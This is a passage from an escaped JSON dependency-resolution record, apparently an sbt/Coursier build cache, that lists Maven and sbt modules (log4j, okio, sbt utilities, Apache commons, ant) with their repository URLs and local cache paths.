"callers\":[]},{\"module\":{\"organization\":\"org.apache.logging.log4j\",\"name\":\"log4j-api\",\"revision\":\"2.11.2\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"log4j-api\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/apache/logging/log4j/log4j-api/2.11.2/log4j-api-2.11.2.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/logging/log4j/log4j-api/2.11.2/log4j-api-2.11.2.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"com.squareup.okio\",\"name\":\"okio\",\"revision\":\"1.17.2\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"okio\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/com/squareup/okio/okio/1.17.2/okio-1.17.2.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/squareup/okio/okio/1.17.2/okio-1.17.2.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"util-interface\",\"revision\":\"1.3.3\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"util-interface\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/util-interface/1.3.3/util-interface-1.3.3.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/util-interface/1.3.3/util-interface-1.3.3.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/util\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.apache.logging.log4j\",\"name\":\"log4j-core\",\"revision\":\"2.11.2\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"log4j-core\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/apache/logging/log4j/log4j-core/2.11.2/log4j-core-2.11.2.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/logging/log4j/log4j-core/2.11.2/log4j-core-2.11.2.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"util-logging_2.12\",\"revision\":\"1.3.3\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"util-logging_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/util-logging_2.12/1.3.3/util-logging_2.12-1.3.3.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/util-logging_2.12/1.3.3/util-logging_2.12-1.3.3.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/util\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"util-tracking_2.12\",\"revision\":\"1.3.3\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"util-tracking_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/util-tracking_2.12/1.3.3/util-tracking_2.12-1.3.3.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/util-tracking_2.12/1.3.3/util-tracking_2.12-1.3.3.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/util\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"com.eed3si9n\",\"name\":\"sjson-new-murmurhash_2.12\",\"revision\":\"0.8.3\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"sjson-new-murmurhash_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/com/eed3si9n/sjson-new-murmurhash_2.12/0.8.3/sjson-new-murmurhash_2.12-0.8.3.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/eed3si9n/sjson-new-murmurhash_2.12/0.8.3/sjson-new-murmurhash_2.12-0.8.3.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/eed3si9n/sjson-new\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"compiler-bridge_2.12\",\"revision\":\"1.3.4\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"compiler-bridge_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/compiler-bridge_2.12/1.3.4/compiler-bridge_2.12-1.3.4.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/compiler-bridge_2.12/1.3.4/compiler-bridge_2.12-1.3.4.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/zinc\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"actions_2.12\",\"revision\":\"1.3.8\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"actions_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/actions_2.12/1.3.8/actions_2.12-1.3.8.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/actions_2.12/1.3.8/actions_2.12-1.3.8.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/sbt\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"scripted-sbt-redux_2.12\",\"revision\":\"1.3.8\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"scripted-sbt-redux_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/scripted-sbt-redux_2.12/1.3.8/scripted-sbt-redux_2.12-1.3.8.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/scripted-sbt-redux_2.12/1.3.8/scripted-sbt-redux_2.12-1.3.8.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/sbt\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scalactic\",\"name\":\"scalactic_2.12\",\"revision\":\"3.0.8\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"scalactic_2.12\",\"type\":\"bundle\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scalactic/scalactic_2.12/3.0.8/scalactic_2.12-3.0.8.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scalactic/scalactic_2.12/3.0.8/scalactic_2.12-3.0.8.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://www.scalatest.org\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.codehaus.plexus\",\"name\":\"plexus-utils\",\"revision\":\"3.0.22\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"plexus-utils\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/codehaus/plexus/plexus-utils/3.0.22/plexus-utils-3.0.22.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/codehaus/plexus/plexus-utils/3.0.22/plexus-utils-3.0.22.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://plexus.codehaus.org/plexus-utils\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"zinc-compile-core_2.12\",\"revision\":\"1.3.4\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"zinc-compile-core_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/zinc-compile-core_2.12/1.3.4/zinc-compile-core_2.12-1.3.4.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/zinc-compile-core_2.12/1.3.4/zinc-compile-core_2.12-1.3.4.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/zinc\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"testing_2.12\",\"revision\":\"1.3.8\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"testing_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/testing_2.12/1.3.8/testing_2.12-1.3.8.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/testing_2.12/1.3.8/testing_2.12-1.3.8.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/sbt\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"scripted-plugin_2.12\",\"revision\":\"1.3.8\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"scripted-plugin_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/scripted-plugin_2.12/1.3.8/scripted-plugin_2.12-1.3.8.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/scripted-plugin_2.12/1.3.8/scripted-plugin_2.12-1.3.8.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/sbt\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"com.eed3si9n\",\"name\":\"sbt-assembly\",\"revision\":\"0.14.10\",\"configurations\":\"compile\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{\"sbtVersion\":\"1.0\",\"scalaVersion\":\"2.12\"},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"sbt-assembly\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo.scala-sbt.org/scalasbt/sbt-plugin-releases/com.eed3si9n/sbt-assembly/scala_2.12/sbt_1.0/0.14.10/jars/sbt-assembly.jar\",\"extraAttributes\":{\"sbtVersion\":\"1.0\",\"scalaVersion\":\"2.12\"},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo.scala-sbt.org/scalasbt/sbt-plugin-releases/com.eed3si9n/sbt-assembly/scala_2.12/sbt_1.0/0.14.10/jars/sbt-assembly.jar\"]],\"missingArtifacts\":[],\"publicationDate\":\"2019-08-06T10:52:23+08:00\",\"evicted\":false,\"extraAttributes\":{\"sbtVersion\":\"1.0\",\"scalaVersion\":\"2.12\"},\"configurations\":[{\"name\":\"pom\"},{\"name\":\"test\"},{\"name\":\"provided\"},{\"name\":\"docs\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"sources\"},{\"name\":\"runtime\"}],\"licenses\":[[\"MIT License\",\"https://github.com/sbt/sbt-assembly/blob/master/LICENSE\"]],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-lang\",\"name\":\"scala-library\",\"revision\":\"2.12.10\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{\"info.apiURL\":\"https://www.scala-lang.org/api/2.12.10/\"},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"scala-library\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/.sbt/boot/scala-2.12.10/lib/scala-library.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://www.scala-lang.org/\",\"extraAttributes\":{\"info.apiURL\":\"https://www.scala-lang.org/api/2.12.10/\"},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"template-resolver\",\"revision\":\"0.1\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"template-resolver\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/template-resolver/0.1/template-resolver-0.1.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/template-resolver/0.1/template-resolver-0.1.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/template-resolver\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"librarymanagement-ivy_2.12\",\"revision\":\"1.3.1\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"librarymanagement-ivy_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/librarymanagement-ivy_2.12/1.3.1/librarymanagement-ivy_2.12-1.3.1.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/librarymanagement-ivy_2.12/1.3.1/librarymanagement-ivy_2.12-1.3.1.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/librarymanagement\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"zinc-lm-integration_2.12\",\"revision\":\"1.3.8\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"zinc-lm-integration_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/zinc-lm-integration_2.12/1.3.8/zinc-lm-integration_2.12-1.3.8.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/zinc-lm-integration_2.12/1.3.8/zinc-lm-integration_2.12-1.3.8.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/sbt\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]}],\"details\":[]},{\"configuration\":{\"name\":\"docs\"},\"modules\":[],\"details\":[]},{\"configuration\":{\"name\":\"optional\"},\"modules\":[],\"details\":[]},{\"configuration\":{\"name\":\"compile\"},\"modules\":[{\"module\":{\"organization\":\"org.apache.commons\",\"name\":\"commons-lang3\",\"revision\":\"3.4\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[{\"organization\":\"org.apache.maven.wagon\",\"name\":\"wagon-provider-api\",\"artifact\":\"*\",\"configurations\":[],\"crossVersion\":{\"type\":\"Disabled\"}}],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"commons-lang3\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/apache/commons/commons-lang3/3.4/commons-lang3-3.4.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/commons/commons-lang3/3.4/commons-lang3-3.4.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://commons.apache.org/proper/commons-lang/\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.apache.maven\",\"name\":\"maven-plugin-api\",\"revision\":\"3.3.9\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"maven-plugin-api\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/apache/maven/maven-plugin-api/3.3.9/maven-plugin-api-3.3.9.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/maven/maven-plugin-api/3.3.9/maven-plugin-api-3.3.9.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.apache.ant\",\"name\":\"ant\",\"revision\":\"1.9.9\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"ant\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/apache/ant/ant/1.9.9/ant-1.9.9.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/ant/ant/1.9.9/ant-1.9.9.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://ant.apache.org/\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.apache.maven\",\"name\":\"maven-artifact\",\"revision\":\"3.3.9\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[{\"organization\":\"org.apache.maven.wagon\",\"name\":\"wagon-provider-api\",\"artifact\":\"*\",\"configurations\":[],\"crossVersion\":{\"type\":\"Disabled\"}}],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"maven-artifact\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/apache/maven/maven-artifact/3.3.9/maven-artifact-3.3.9.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/maven/maven-artifact/3.3.9/maven-artifact-3.3.9.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"javax.inject\",\"name\":\"javax.inject\",\"revision\":\"1\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[{\"organization\":\"javax.el\",\"name\":\"el-api\",\"artifact\":\"*\",\"configurations\":[],\"crossVersion\":{\"type\":\"Disabled\"}},{\"organization\":\"org.jboss.ejb3\",\"name\":\"jboss-ejb3-api\",\"artifact\":\"*\",\"configurations\":[],\"crossVersion\":{\"type\":\"Disabled\"}},{\"organization\":\"org.jboss.interceptor\",\"name\":\"jboss-interceptor-api\",\"artifact\":\"*\",\"configurations\":[],\"crossVersion\":{\"type\":\"Disabled\"}}],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"javax.inject\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/javax/inject/javax.inject/1/javax.inject-1.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/javax/inject/javax.inject/1/javax.inject-1.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://code.google.com/p/atinject/\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"javax.annotation\",\"name\":\"jsr250-api\",\"revision\":\"1.0\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[{\"organization\":\"javax.el\",\"name\":\"el-api\",\"artifact\":\"*\",\"configurations\":[],\"crossVersion\":{\"type\":\"Disabled\"}},{\"organization\":\"org.jboss.ejb3\",\"name\":\"jboss-ejb3-api\",\"artifact\":\"*\",\"configurations\":[],\"crossVersion\":{\"type\":\"Disabled\"}},{\"organization\":\"org.jboss.interceptor\",\"name\":\"jboss-interceptor-api\",\"artifact\":\"*\",\"configurations\":[],\"crossVersion\":{\"type\":\"Disabled\"}}],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"jsr250-api\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/javax/annotatio